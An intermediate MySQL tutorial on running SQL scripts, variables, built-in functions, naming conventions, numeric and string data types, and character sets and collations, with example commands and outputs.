TABLE OF CONTENTS (HIDE)

Database Programming

An Intermediate MySQL Tutorial
- Scripting, Data Types, Examples

This article explains some concepts in depth, such as scripting and data types. Read "MySQL for Beginners" for the basics.

Scripting

Creating and Running Scripts

I shall begin by describing the syntax of a MySQL script, as scripts will be used for all the examples in this tutorial.

Instead of issuing each of the SQL statements from a mysql client interactively, it is often more convenience to keep the statements in a script. You could then run the entire script, or copy and paste selected statements to run.

Example

Use a programming text editor to create the following script and saved as "testscript.sql" in a chosen directory (e.g., "d:\myproject\sqlscripts"). You should use ".sql" as the file extension.

I recommend NetBeans which provides direct support to MySQL database (read NetBeans and MySQL), or NotePad++ (@ http://notepad-plus.sourceforge.net/uk/site.htm), which recognizes ".sql" file as a SQL script with syntax highlighting.

/* 
 * My First MySQL Script - testscript.sql.
 * You need to run this script with an authorized user.
 */
SHOW DATABASES;                -- List the name of all the databases in this server
USE mysql;                     -- Set system database 'mysql' as the current database
SELECT user, host FROM user;   -- List all users by querying table 'user'

You can run the script using mysql client in two ways: batch mode or using source command.

Running Script in Batch Mode

To run a script in batch (non-interactive) mode, start a mysql client and redirect the script as the input, as follows:

> mysql -u username -p < path-to\scriptName.sql

The input redirection operator '<' re-directs the input from the file, instead of the default standard input (i.e., keyboard). You may provide an absolute or relative path of the filename. You may need to double quote the filename if it contains special characters such as blank (strongly discouraged!).

For example, we invoke the mysql client with user "myuser" in batch mode running the script "testscript.sql" created earlier. I assume that myuser is authorized to access mysql database.

shell> mysql -u myuser -p < d:\myproject\sqlscripts\testscript.sql
Enter password: ********
Database              <= Output of SHOW DATABASES - Header
information_schema
eastwind
mysql
test
user    host          <= Output of SELECT - Header
root    127.0.0.1
myuser  localhost
root    localhost

The output contains the column headers and the rows selected. The column values are separated by 'tab'. This is to facilitate direct processing by another program. This format is known as TSV (Tab-Separated Values), similar to CSV (Comma-Separated Values).

You could also redirect the output to a text file (via the output redirection operator '>'), for example,

> mysql -u myuser -p < d:\myproject\sqlscripts\testscript.sql > output.txt

To get the "table-like" output, use -t (table) option, for example,

> mysql -u myuser -p -t < d:\myproject\sqlscripts\testscript.sql
Enter password: ********
+--------------------+
| Database           |
+--------------------+
| information_schema |
| eastwind           |
| mysql              |
| test               |
+--------------------+
+--------+-----------+
| user   | host      |
+--------+-----------+
| root   | 127.0.0.1 |
| myuser | localhost |
| root   | localhost |
+--------+-----------+

You could echo the input commands via -vvv (verbose) option, for example,

shell> mysql -u myuser -p -t -vvv < d:\myproject\sqlscripts\testscript.sql
Enter password: ********
--------------
SHOW DATABASES
--------------
   
+--------------------+
| Database           |
+--------------------+
| information_schema |
| eastwind           |
| mysql              |
| test               |
+--------------------+
4 rows in set (0.00 sec)
   
--------------
SELECT user, host FROM user
--------------
   
+--------+-----------+
| user   | host      |
+--------+-----------+
| root   | 127.0.0.1 |
| myuser | localhost |
| root   | localhost |
+--------+-----------+
4 rows in set (0.00 sec)
   
Bye

In batch mode, you can also execute statement(s) directly via -e (evaluate) option. For example,

> mysql -u myuser -p -vvv -e "SELECT user, host FROM user; SHOW databases" mysql
Enter password: ********
--------------
SELECT user, host FROM user
--------------
   
+-----------+-----------+
| user      | host      |
+-----------+-----------+
| root      | 127.0.0.1 |
  ....... 
+-----------+-----------+
   
--------------
SHOW databases
--------------

+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| test               |
  ......
+--------------------+
   
Bye
Running Script via SOURCE Command

In an interactive mysql client session, you can use the source command (or \. shorthand command) to run a script. For example,

-- Start and login to a mysql interactive client
shell> mysql -u myuser -p
Enter password: ********
......

-- You can use 'source' command to run a script
mysql> SOURCE d:/myproject/sqlscripts/mytestscript.sql
......

Notes:

  • You could provide either absolute or relative path.
  • You need to use Unix-style forward-slash '/' as the directory separator. On Windows systems, you could also replace backslash '\' with double backslash e.g., "d:\\myproject\\sqlscripts\\mytestscript.sql".
  • No single or double quotes needed (nor allowed) in filename.
  • "source" is a client-side command. Hence, there is no need for the terminating ';' (to send the command to the server for processing).

MySQL Scripting Language Syntax

Comments

A multi-line comment begins with /* and ends with */ (just like the C/C++/Java language). An end-of-line comment begins with '-- ' (two dashes and a space) or #, which lasts till the end of the current line.

Comments are ignored by the processing engine but are important to provide explanation and documentation for the script. I strongly encourage you to use comments liberally.

MySQL Specific Codes

Statements enclosed within /*! .... */ are known as MySQL specific codes. They are recognized by the MySQL engine, but ignored by other database engines. In other words, they will be processed by MySQL but treated as comments by other databases.

You could include an optional MySQL version number, e.g., /*!40014 .... */. The statements will be processed by MySQL if the server's version is at least at the specified version, e.g., version 4.00.14.

You can find the MySQL server version via show version() command.

MySQL specific codes (with version number) are often generated when you export a database via mysqldump utility. For example,

/*!40101 SET NAMES utf8 */;
/*!40101 SET SQL_MODE=''*/;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `eastwind` /*!40100 DEFAULT CHARACTER SET latin1 */;
......
Identifiers and Backquotes

Identifiers (such as database names, table names and column names) must be back-quoted if they contain blanks and special characters; or are reserved word, e.g., `date`, `order`, `desc` (reserved words), `Customer Name` (containing space).

It is a good practice to back-quote all the identifiers in a script to distinguish the names from the reserved words (possibly in future MySQL versions).

Case Sensitivities

MySQL keywords are not case-sensitive. For clarity, I often show the keywords in uppercase (e.g., CREATE TABLE, SELECT).

The identifiers (such as database names, table names and column names) are case sensitive in some platforms; but case insensitive in others (e.g., In general, identifiers are case sensitive in Unixes but case-insensitive in Windows). Hence, it is a good practice to treat the identifiers as case-sensitive in th script.

String comparison and sorting depend on the character collation sequence used. By default, string comparison in MySQL (Windows) are not case sensitive. (Need to further check on Unixes and Macs.)

Literals

String Literals: A string literal (or string value) is enclosed by a pair of single quotes (e.g., 'a string') (recommended); or a pair of double quotes (e.g., "a string").

Some characters may create ambiguity when placed inside a single-quoted or double-quoted string, e.g., you cannot include a single quote in a single-quoted string. Some characters, such as tab, newline, are non-printable, and require a special notation to be included in a sting. Back-slash '\' is known as an escape character, which modifies the meaning of the character followed, as tabulated below:

Escape Sequence Meaning Why
\' Single quote ' To resolve ambiguity.
' and " used for enclosing string,
\ for escape,
% and _ for pattern matching
\" Double quote "
\\ Back slash \
\% Percent %
\_ Underscore _
\n Newline or LineFeed (FF) (0AH) For non-printable symbols
\r Carriage Return (CR) (0DH)
\b Back Space (08H)
\t Tab (09H)
\0 ASCII NUL (00H)
\Z Control-Z (1AH)

An escape followed by any other character listed above is treated as the character, e.g., '\x' is 'x'. The escape sequence is case sensitive, i.e., '\t' is tab, but '\T' is 'T'. String can be single-quoted or double-quoted to give you the flexibility of including quotes in a string without using escape sequence, e.g., 'This is "GREAT"', "Let's begin".

Hex Literals: Hex values are written as 0x.... or X'....' or x'....', e.g., 0xABCD, 0xDEF, X'ABCD', x'ABCD'. You can obtain the hex value of a string using function HEX(). For example,

-- Show hex value of a string
mysql> SELECT HEX('testing');
+----------------+
| HEX('testing') |
+----------------+
| 74657374696E67 |
+----------------+
   
-- Hex value is displayed as string
mysql> SELECT 0x74657374696E67;
+------------------+
| 0x74657374696E67 |
+------------------+
| testing          |
+------------------+
   
-- Show hex value of Chinese characters in GBK with CMD uses codepage 936
mysql> SELECT HEX('您好');
+-------------+
| HEX('您好') |
+-------------+
| C4FABAC3    |
+-------------+
   
mysql> SELECT 0xC4FABAC3;
+------------+
| 0xC4FABAC3 |
+------------+
| 您好       |
+------------+

Bit Literals: Similarly, a bit literal is written as 0b... or b'...', e.g., 0b1011, b'10111011'.

Variables

There are various types of variables in MySQL: System variables (system-wide), user-defined variables (within a connection) and local variables (within a stored function/procedure).

User-Defined Variables: A user-defined variable begins with a '@' sign, e.g., @myCount, @customerCreditLimit. A user-defined variable is connection-specific, and is available within a connection. A variable defined in one client session is not visible by another client session. You may use a user-defined variable to pass a value among SQL statements within the same connection.

In MySQL, you can define a user variables via:

  1. SET @varname = value or (SET @varname := value)
  2. SELECT @varname := value ...
  3. SELECT columnName INTO @varname ...

For examples,

mysql> SET @today = CURDATE();    -- can use = or :=
mysql> SELECT name FROM patients WHERE nextVisitDate = @today;  -- can use the variable within the session
 
mysql> SET @v1 = 1, @v2 = 2, @v3 = 3;
mysql> SELECT @v1, @v2, @v3, @v4 := @v1 + @v2;  -- Use := in SELECT, because = is for comparison
 
mysql> SELECT @ali_dob := dateOfBirth FROM patients WHERE name = 'Ali';
mysql> SELECT dateOfBirth INTO @kumar_dob FROM patients WHERE name = 'kumar';
mysql> SELECT name WHERE dateOfBirth BETWEEN @ali_dob AND @kumar_dob;

Like all scripting languages, SQL scripting language is loosely-type. You do not have to explicitly declare the type of a variable, but simply assign a value.

System Variables: MySQL server maintains system variables, grouped in two categories: global and session. Global variables affect the overall operation of the server. Session variables affect individual client connections. A system variable may have both a global value and a session value.

Global variables are referenced via GLOBAL variableName, or @@global.variableName. Session variables are referenced via SESSION variableName, @@session.variableName or simply @@variableName.

You can use SET statement to change the value of a variable. For example,

SET GLOBAL sort_buffer_size = 1000000;
SET global.sort_buffer_size = 1000000;
SET SESSION sort_buffer_size = 1000000;
SET session.sort_buffer_size = 1000000;
SET @@sort_buffer_size = 1000000;        -- Session

Use SHOW SESSION|GLOBAL VARIABLES to display the value of variables. You could use a pattern matching LIKE clause to limit the outputs. For example,

-- Show all session variables beginning with 'character_set'.
SHOW VARIABLE LIKE 'character\_set%';
   -- Need to use '\_' for '_' inside a string, because '_' denotes any character.
 
-- Show all global variable beginning with 'max_'
SHOW GLOBAL VARIABLE LIKE 'max\_%';

Local Variables (within a Stored Program): You could define local variables for stored programs (such as function and procedure). The scope of a local variable is within the program. You need to use a DECLARE statement to declare a local variable. Local variable will be discussed later.

MySQL Built-in Functions

For details of MySQL built-in functions, refer to MySQL manual "Functions and Operators" @ http://dev.mysql.com/doc/refman/5.5/en//functions.html.

MySQL String Functions

Reference: String Functions @ http://dev.mysql.com/doc/refman/5.5/en/string-functions.html.

  • LENGTH(str): returns the length of the string.
  • INSTR(str, subStr): returns the index of the subStr in the str or 0 otherwise. Index begins at 1.
  • SUBSTR(str, fromIndex, len): returns the substring from index of length. Index starts at 1.
  • UCASE(str), LCASE(str): returns the uppercase and lowercase counterpart.
  • CONCAT(str1, str2, ...): returns the concatenated string.
  • CONCAT_WS(separator, str1, str2, ...): concatenate with separator.
  • more
MySQL GROUP BY Aggregate Functions

Reference: MySQL "GROUP BY (Aggregate) Functions" @ https://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html.

We can apply GROUP BY aggregate functions to each group of rows.

  • COUNT([DISTINCT] col): returns the count of non-NULL rows. The optional DISTINCT discards duplicate rows.
  • COUNT(*): returns the count of the rows (including NULL).
  • MAX([DISTINCT] col), MIN([DISTINCT] col), AVG([DISTINCT] col), SUM([DISTINCT] col), STD([DISTINCT] col): these functions accept an optional keyword DISTINCT to discard duplicates.
  • GROUP_CONCAT([DISTINCT] col [ORDER BY ...] [SEPARATOR ...]): returns a string with the concatenated non-NULL values from a group. You can apply optional DISTINCT and ORDER BY. The default SEPARATOR is comma ','.
MySQL Date/Time Functions

[TODO]

MySQL Mathematical Functions
  • PI().
  • RAND(): return a random float between 0 and 1.
  • ABS(number), SIGN(number): return -1 if negative, 0 for zero, and 1 if positive.
  • CEIL(float), FLOOR(float), ROUND(float).
  • GREATEST(value1, value2,...), LEAST(value1, value2,...),
  • EXP(power): base e, LN(number): base e, LOG(number, base), LOG2(number), LOG10(number), POWER(number, exponent), SQRT(number).
  • SIN(angleInRadians), ASIN(number), COS(angleInRadians), ACOS(number), TAN(angleInRadians), ATAN(number), ATAN2(y, x), COT(angleInRadians).
  • DEGREES(angleInRadians), RADIANS(angleInDegrees).
  • BITCOUNT(number): return the number of bits set to 1.
  • CONV(number, fromBase, toBase), OCT(number)
  • MOD(number, modulo),
  • FORMAT(float, decimalPlaces): Format the given float with the given decimal places. TRUNCATE(float, decimalPlaces): allow negative decimalPlaces.

Naming Convention

My preferred naming convention is as follows:

  • Database name is a singular noun comprising one or more words, in lowercase joined with underscore '_', e.g., the_arena, southwind_traders.
  • Table name is a plural noun comprising one or more words, in lowercase joined with underscore '_', e.g., customers, orders, order_details, products, product_lines, product_extras. Junction table created to support many-to-many relationship between two tables may include both the table name, (e.g., suppliers_products, movies_actors) or an action verbs (e.g., writes (author writes books)).
  • Column name is a singular noun comprising one or more words, in lower case joined with underscores or in camel-case begins with a lowercase letter, e.g. customerID, name, dateOrdered, and quantityInStock.
  • MySQL displays database names and table names in lowercase, but column names in its original case.
  • It is a good practice NOT to include special characters, especially blank, in names (unless you are looking for more challenge - these names must be back-quoted). Avoid MySQL reserved words, especially date, time, order, desc (used dateOrdered, timeOrdered, and orders instead). Backquote the names, if they contain special characters, or are SQL reserved words, e.g., `date`, `order`, `Customer ID`. It is a good practice to always backquote the names in script.

[TODO] Camel-case or lower-case join with underscore?

MySQL Data Types

As a programmer, understanding the data types is curial in understanding the working of the underlying database system. (Read "A Tutorial on Data Representation - Integers, Floating-point Numbers, and Character Sets".)

MySQL supports many data types, grouped in 3 categories:

  1. Numeric: including integers, floating-point numbers, bits and boolean.
  2. String: including fixed-length and variable-length strings, binary data, and collections (enumeration and set).
  3. Date/Time: Date and time are extremely important in database applications. This is because business records often carry date/time information (e.g., orderDate, paymentDate). There is also a need to time-stamp the creation and last update of records for auditing and security considerations. MySQL provides many date/time data types (e.g., DATETIME, DATE, TIME, YEAR, TIMESTAMP) and built-in functions for date/time manipulation.

Numeric - Integers

Integers, by default, are signed integers; unless UNSIGNED is declared.

You could set the display width, using the syntax INTEGER_TYPE(n), where n is the display field-width of up to 255, e.g., INT(10). You could also specify ZEROFILL to pad the displayed numbers with leading zeros (for UNSIGNED only) instead of blanks. The field-width affects only the display, and not the number stored.

MySQL supports many integer types with various precisions and ranges.

  • TINYINT: 8-bit precision. The range is [-128, 127] for signed integer, and [0, 255] for unsigned.
  • SMALLINT: 16-bit precision. The range is [-32768, 32767] for signed integer, and [0, 65535] for unsigned.
  • MEDIUMINT: 24-bit precision. The range is [-8388608, 8388607] for signed integer, and [0, 16777215] for unsigned.
  • INT (or INTEGER): 32-bit precision. The range is [-2147483648, 2147483647] for signed integer, and [0, 4294967295] for unsigned.
  • BIGINT: 64-bit precision. The range is [-9223372036854775808, 9223372036854775807] for signed integer, and [0, 18446744073709551615] for unsigned.
  • BIT(n): A n-bit column. To input a bit-value, use the syntax b'value' or 0bvalue, e.g., b'1001', 0b10010.
  • BOOLEAN (or BOOL): same as TINYINT(1) (with range of -128 to 127, display field-width of 1). Value of zero is considered false; non-zero is considered true. You could also use BIT(1) to store boolean value.

Choosing the right integer type is important for optimizing storage usage and computational efficiency. For example, for a integer column with a range of 1 to 9999, use SMALLINT(4) UNSIGNED: for 1 to 9999999, use MEDIUMINT(7) UNSIGNED (which shall be sufficient for a small business, but always allow more room for future expansion).

Integers (and floating-point numbers to be discussed later) could be declared as AUTO_INCREMENT, with default starting value of 1. When you insert a NULL (recommended) (or 0, or a missing value) into an AUTO_INCREMENT column, the maximum value of that column plus 1 would be inserted. You can also insert any valid value to an AUTO_INCREMENT column, bypassing the auto-increment. Take note that further INSERT would fail if the last INSERT has reached the maximum value. Hence, it is recommended to use INT for AUTO_INCREMENT column to avoid handling over-run. There can only be one AUTO_INCREMENT column in a table and the column must be defined as a key.

Example (Testing the Integer Data Types): Read "integer_arena.sql".

Example (Testing AUTO_INCREMENT): autoincrement_arena.sql.

Numeric - Fixed-Point & Floating-Point Numbers

MySQL supports both approximated floating points (FLOAT and DOUBLE) and exact fixed-point point (DECIMAL).

  • FLOAT: 32-bit single precision floating-point numbers. You can specify UNSIGNED to disallow negative number, and ZEROFILL to pad the displayed number with zeros.
  • DOUBLE (or DOUBLE PRECISION or REAL): 64-bit double precision floating-point numbers.
  • DECIMAL(n, d) (or DEC or NUMERIC or FIXED): fixed-point decimal numbers, where n is the number of digits with d decimal places. For example, DECIMAL(6, 2) specifies 6 total digits (not including the decimal point) with 2 digit after the decimal point, which has the range of -9999.99 to 9999.99.
    Unlike INT(n), where n specifies the display field-width and does not affect the number stored; n in DECIMAL(n, d) specifies the range and affects the number stored.
    The fixed-point DECIMAL is not available in popular languages such as C/C++/Java/C#. DECIMAL is an exact representation, as it is represented as integer with a fix decimal point. On the other hand, FLOAT and DOUBLE values are approximated and inexact, which create problems in comparison and cause rounding errors in arithmetic operations. Attempt to compare inexact values using '=' and '<>' leads to unexpected result.
    DECIMAL type was created for representing currency, which is exact and does not suffer from rounding errors in addition and subtraction. For example, DECIMAL(n, 2). DECIMAL values can be compared with '=' or '<>'.
  • FLOAT(n, d) or DOUBLE(n, d): Stored with n total digits with d decimal places. Exact or Approximated?? Advisable to use DECIMAL(n, d).

The fixed-point and floating-point numbers can also be declared as UNSIGNED to exclude negative numbers.

Example (Testing the Floating-point Data Type): Read "floatingpoint_arena.sql".

Character Sets and Collations

Strings are made up of a sequence of characters. Before presenting the various string data types, it is important to understand the so-called character set and collating sequence (or collation).

Character Sets

A character set (also called charset, character encoding, character map, code page) defines a set of character and maps each character to a unique numeric code. For example, in ASCII, character 'A' is assigned 65, 'a' is 97, '0' is 48 and space is 32. The most commonly-used character sets are the 8-bit Latin-1 (ISO/IEC 8859-1) for English characters (which is backward compatible with 7-bit ASCII), and multi-byte Unicode (ISO/IEC 10646) for internationalization. Unicode can be encoded in variable-length UTF8 (1-3 bytes) for fixed-length UCS2 (2 bytes).

For more details on character sets, read "A Tutorial on Data Representation - Integers, Floating-point Numbers, and Character Sets", section "Character Sets and Encoding Schemes".

MySQL's UCS-2 is in big-endian without BOM (Byte Order Mark), i.e., UCS-2BE or UTF2BE. MySQL uses no BOM for UTF-8.

Collating Sequences

A collating sequence (or collation) refers to the orders in which individual characters should be ranked in comparing or sorting the strings. In other words, a collation is a set of rules for ranking characters in a character set.

A string may contain uppercase and lowercase characters, digits and symbols. As an example, suppose we wish to sort three strings: "apple", "BOY", and "Cat" encoded in ASCII. If we rank the characters according to the underlying ASCII code numbers, the order would be "BOY", "apple" and "Cat". It is because uppercase letters have smaller code numbers than lowercase letters in ASCII code. Ranking strings according to their underlying code numbers is known as binary collation. Binary collation does not agree with the so-called dictionary order, where the same uppercase and lowercase letters have the same rank.

There are many other collating sequences available. Some case-insensitive (ci) dictionary-order collating sequences have the same rank for the same uppercase and lowercase letter, i.e., 'A', 'a''B', 'b' ⇒ ... ⇒ 'Z', 'z'. Some case-sensitive (cs) dictionary-order collating sequences put the uppercase letter before its lowercase counterpart, i.e., 'A''a''B' ⇒ 'b' ⇒ ... ⇒ 'Z' 'z'. Typically, space is ranked before digits '0' to '9', followed by the alphabets.

Collating sequence is also language dependent, as different languages use different sets of characters, e.g., a, A, α, Ä, á, é. It becomes more complicated if more than one languages are used, e.g., you need to decide how to rank 'a' and 'α', by choosing an appropriate collating sequence.

MySQL Character Sets and Collations

MySQL 5.5 supports 39 character sets with 197 collations.

You could use command SHOW CHARACTER SET to display all the supported character sets and their default collation; and SHOW COLLATION to display all the collations and the charsets their support.

mysql> SHOW CHARACTER SET;
+----------+-----------------------------+---------------------+--------+
| Charset  | Description                 | Default collation   | Maxlen |
+----------+-----------------------------+---------------------+--------+
| latin1   | cp1252 West European        | latin1_swedish_ci   |      1 |
| utf8     | UTF-8 Unicode               | utf8_general_ci     |      3 |
| ucs2     | UCS-2 Unicode               | ucs2_general_ci     |      2 |
| ascii    | US ASCII                    | ascii_general_ci    |      1 |
  ......
39 rows in set (0.06 sec)
 
mysql> SHOW COLLATION;
+--------------------------+----------+-----+---------+----------+---------+
| Collation                | Charset  | Id  | Default | Compiled | Sortlen |
+--------------------------+----------+-----+---------+----------+---------+
| big5_chinese_ci          | big5     |   1 | Yes     | Yes      |       1 |
| big5_bin                 | big5     |  84 |         | Yes      |       1 |
 ......
197 rows in set (0.01 sec)

The default character set in MySQL is latin1 (aka ISO-8859-1). The default collation for latin1 is latin1_swdish_ci, which is a case-insensitive collation suitable for Swedish/finnish (MySQL was created by some Swedishs). You can list the available collations for latin1, as follows:

mysql> SHOW COLLATION LIKE 'latin1%';
+-------------------+---------+----+---------+----------+---------+
| Collation         | Charset | Id | Default | Compiled | Sortlen |
+-------------------+---------+----+---------+----------+---------+
| latin1_german1_ci | latin1  |  5 |         | Yes      |       1 |
| latin1_swedish_ci | latin1  |  8 | Yes     | Yes      |       1 |
| latin1_danish_ci  | latin1  | 15 |         | Yes      |       1 |
| latin1_german2_ci | latin1  | 31 |         | Yes      |       2 |
| latin1_bin        | latin1  | 47 |         | Yes      |       1 |
| latin1_general_ci | latin1  | 48 |         | Yes      |       1 |
| latin1_general_cs | latin1  | 49 |         | Yes      |       1 |
| latin1_spanish_ci | latin1  | 94 |         | Yes      |       1 |
+-------------------+---------+----+---------+----------+---------+

latin1_general_ci is a case-insensitive collation for multilingual western european. latin1_general_cs is case-sensitive. latin1_bin is the binary collation according to latin1 encoding.

I recommend that you use utf8 charset for applications that require internationalization (i18n) support (because utf8 supports all the languages in this world). The default collation for utf8 is utf8_general_ci. Other collations for utf8 includes:

mysql> SHOW COLLATION LIKE 'utf8%';
+--------------------+---------+-----+---------+----------+---------+
| Collation          | Charset | Id  | Default | Compiled | Sortlen |
+--------------------+---------+-----+---------+----------+---------+
| utf8_general_ci    | utf8    |  33 | Yes     | Yes      |       1 |
| utf8_bin           | utf8    |  83 |         | Yes      |       1 |
| utf8_unicode_ci    | utf8    | 192 |         | Yes      |       8 |
| utf8_icelandic_ci  | utf8    | 193 |         | Yes      |       8 |
| utf8_latvian_ci    | utf8    | 194 |         | Yes      |       8 |
| utf8_romanian_ci   | utf8    | 195 |         | Yes      |       8 |
  ......

You may want to try out some of these collations by ranking space, numbers, uppercase and lowercase letters, and some typical strings.

Specifying Character Set and Collation in MySQL

You could specify the character set and collation via keyword CHARACTER SET (or CHARSET) and COLLATE. They could be set at 4 levels: server, database, table, and column.

To set the charset and collation for the server, start mysqld with --character-set-server=charset and --collation-server=collation options. The default charset is latin1.

You can set the default charset and collation for an database in CREATE DATABASE. For example,

CREATE DATABASE databaseName
DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci;

You can set the character set and collation for table and column in CREATE TABLE. For example,

CREATE TABLE IF NOT EXISTS StringArena (
   cString1 VARCHAR(50) CHARACTER SET latin1 COLLATE latin1_general_cs,  -- case-sensitive 'A' -> 'a' -> 'B' -> 'b'
   cString2 CHAR(10) CHARACTER SET latin1,                               -- default collation of latin1_swedish_ci
   cString3 TEXT
) DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci;                    -- case-insensitive 'A' and 'a' are the same

In the above example, the default character set for all the string columns for the table is utf8 (for unicode support) with collating sequence of utf8_unicode_ci (default). However, column cString1 uses character set latin1 with collation latin1_general_cs; column cString2 uses character set Latin1 with default collation latin1_swedish_ci (not from table default but from the charset default); column cString3 uses the default character set and collation of the table.

Example (Testing Character Sets and Collations): Read "charset_arena.sql".

Character Set and Collation Related System Variables

There are quite a number of system variables related to charset and collation, with names starting with "character_set_" and "collation_", respectively. You can list them as follows:

mysql> SHOW VARIABLES LIKE 'character\_set\_%';
            --  Use the escape '\_' for '_'
+--------------------------+--------+
| Variable_name            | Value  |
+--------------------------+--------+
| character_set_client     | latin1 |
| character_set_connection | latin1 |
| character_set_database   | latin1 |   <= default charset for database
| character_set_filesystem | binary |
| character_set_results    | latin1 |
| character_set_server     | latin1 |   <= default charset for server
| character_set_system     | utf8   |   <= meta-data
+--------------------------+--------+
7 rows in set (0.00 sec)
   
mysql> SHOW VARIABLES LIKE 'collation\_%';
+----------------------+-------------------+
| Variable_name        | Value             |
+----------------------+-------------------+
| collation_connection | latin1_swedish_ci |
| collation_database   | latin1_swedish_ci |  <= default collation for database
| collation_server     | latin1_swedish_ci |  <= default collation for server
+----------------------+-------------------+
3 rows in set (0.00 sec)

The system variables character_set_server, character_set_database and collation_server, collation_database maintain the default charset and collation for the server and the current database respectively.

In MySQL, columns, tables, databases may use different character sets. However, the meta-data (such as column names and attributes) must be stored in the same character set, and include all languages. Hence, meta-data, by default, stored in UTF-8, as maintained in the system variable character_set_system.

Character Set for Client-Server Communication

A client connects to the server via a so-called connection object. The client sends the SQL statements over the connection to the server. The server returns the results via the connection to the client. Server maintains a connection for each client, and maintains connection-related character set and collation system variables for each client connection.

The client sends its statements using character_set_client. They are translated to character_set_connection, and uses collation_connection for comparing string literals. The server returns the results to the client using character_set_results. You can use command "SET NAMES charset" (e.g., "SET NAMES 'utf8'") to change the character set used for client-server communication. "SET NAMES", in effect, changes system variables character_set_client, character_set_connection, and character_set_results. For example,

-- Default charset for client, connection, and results is latin1
mysql> SHOW VARIABLES LIKE 'character\_set\_%';
+--------------------------+--------+
| Variable_name            | Value  |
+--------------------------+--------+
| character_set_client     | latin1 |
| character_set_connection | latin1 |
| character_set_database   | latin1 |
| character_set_filesystem | binary |
| character_set_results    | latin1 |
| character_set_server     | latin1 |
| character_set_system     | utf8   |
+--------------------------+--------+
7 rows in set (0.00 sec)
   
mysql> SET NAMES 'utf8';
Query OK, 0 rows affected (0.00 sec)
   
mysql> SHOW VARIABLES LIKE 'character\_set\_%';
+--------------------------+--------+
| Variable_name            | Value  |
+--------------------------+--------+
| character_set_client     | utf8   |  <==
| character_set_connection | utf8   |  <==
| character_set_database   | latin1 |
| character_set_filesystem | binary |
| character_set_results    | utf8   |  <==
| character_set_server     | latin1 |
| character_set_system     | utf8   |
+--------------------------+--------+
7 rows in set (0.00 sec)

When a client (e.g., mysql, mysqlshow, mysqladmin) connects to the server, it sends the name of the character set that it wants to use to the server (default is latin1; or specify in --default-character-set startup option of the client). The server uses this name to set the character_set_client, character_set_results, and character_set_connection system variables for this client connection. In effect, the server performs a "SET NAMES".

String Data Types

MySQL supports fixed-length and variable-length string types:

  • CHAR(n): fix-length string of n characters, right-pad with spaces. The maximum n is 255 characters.
  • VARCHAR(n): variable-length string of up to n characters. The maximum n is 65535 bytes of storage (utf8 characters range from 1-4 bytes).
  • TINYTEXT: up to 255 Bytes
  • TEXT: up to 64 KBytes
  • MEDIUMTEXT: up to 16 MBytes
  • LONGTEXT: up to 4 GBytes

Example: [TODO]

String Literals and String Introducer

A string literal has on optional charset introducer and collate clause. The introducer tells the parser that the string that is followed uses a certain character set.

// Syntax
[_charsetName]'string' [COLLATE collationName]
 
// Example
SELECT 'Test String';
SELECT _latin1'Test String';
SELECT _latin1'Test String' COLLATE ...
 
SELECT HEX('abc');         -- 616263
SELECT _latin1 x'616263';  -- 'abc': can express string in hex code
SELECT HEX(_utf8'abc');    -- 616263
CONVERT(... USING ...) Function

CONVERT(expr USING charset) can be used to convert string between different character sets, e.g.,

SELECT CONVERT(_latin1'....' USING utf8);
INSERT INTO utf8Table (utf8Column) VALUES
   ((SELECT CONVERT(latin1Column USING utf8) FROM latin1Table)));

String introducer merely interprets the string literal and does not change its value; whereas CONVERT() returns a new value of the specified type. For example,

-- default charset is latin1
 
mysql> SELECT HEX(CONVERT('abc' USING ucs2));
+--------------------------------+
| HEX(CONVERT('abc' USING ucs2)) |
+--------------------------------+
| 006100620063                   |
+--------------------------------+
    -- Returns a new UCS2 representation.
    -- Each character in UCS2 takes two bytes
 
mysql> SELECT HEX(_ucs2'abc'), _ucs2'abc';
+-----------------+-----+
| HEX(_ucs2'abc') | ?   |
+-----------------+-----+
| 00616263        | ??  |
+-----------------+-----+
    -- Interpret 'abc' (or x'616263') as two UCS2 characters

UTF8 Charset

For internationalization, UTF8 charset shall be used.

UTF8-Encoded Chinese Characters in Windows' CMD Shell

In brief, do not use CMD shell to work on UTF8 charset. Use a tool such as NetBeans, Eclipse, MySQL workbench or PhpMyAdmin which fully supports UTF8 charset.

If you want to display a text file encoded in a particular character set (e.g., ASCII, Latin1, UTF8) in CMD correctly, you need to choose a matching "codepage". For example, ANSI/Latin1 requires codepage 1252, Simplified Chinese GBK (GB2312) requires 936, UTF8 requires 65001, UCS2LE requires 1200, UCS2BE requires 1201, and the original DOS extended-ASCII uses codepage 437.

CMD is NOT able to detect the character set automatically and switch to the matching codepage. To set the codepage in CMD, issue command "chcp color-page-number", e.g. "chcp 65001" to choose UTF8 codepage. This codepage could display UTF8 text correctly, and display garbage if the text is encoded using other character set, including UCS2, GB2312.

You also have to choose a font (such as Consolas, Lucida Console, but NOT raster font) that supports the characters. To choose the font for CMD, click on the CMD icon ⇒ "Properties" ⇒ "Font".

There are a number of character encoding schemes for Chinese characters, e.g., Unicode (UTF8, UCS2GE, UCS2LE), GB2312, GBK and BIG5, which are not compatible. Read "A Tutorial on Data Representation" Section "Chinese Character Sets" for more details.

Unicode is an international standard, which supports all languages, including Chinese, Japanese and Korean (CJK). Unicode has two frequently-used encoding schemes: UTF8 (1-3 bytes variable-length, the 1-byte codes are backward-compatible with ASCII) and UCS2 (2 byte fixed-length). UTF8 is ideal if your text consists of mainly ASCII (English text), with occasional non-ASCII text. I strongly recommend using UTF8 character set for MySQL columns that require internationalization support. GB2312 is a Chinese national standard for simplified chinese, it is not compatible with UCS2 or UTF8. For example, for the chinese characters "您好", the UCS2 is "60A8 597D", the UTF8 is "E682A8 E5A5BD", the GB1232 is "C4FA BAC3".

Unfortunately, in CMD, the Microsoft Pinyin IME (MSPY), the Chinese character input tool, is disabled for codepage 65001 (UTF8) (?!?!). MSPY works on GB2312 (codepage 936). If you run your MySQL client in CMD, using codepage 936 (GB2312) so that you can input chinese characters (e.g., for INSERT and UPDATE), but your database character columns are using UTF8, you need to handle this situation with great care.

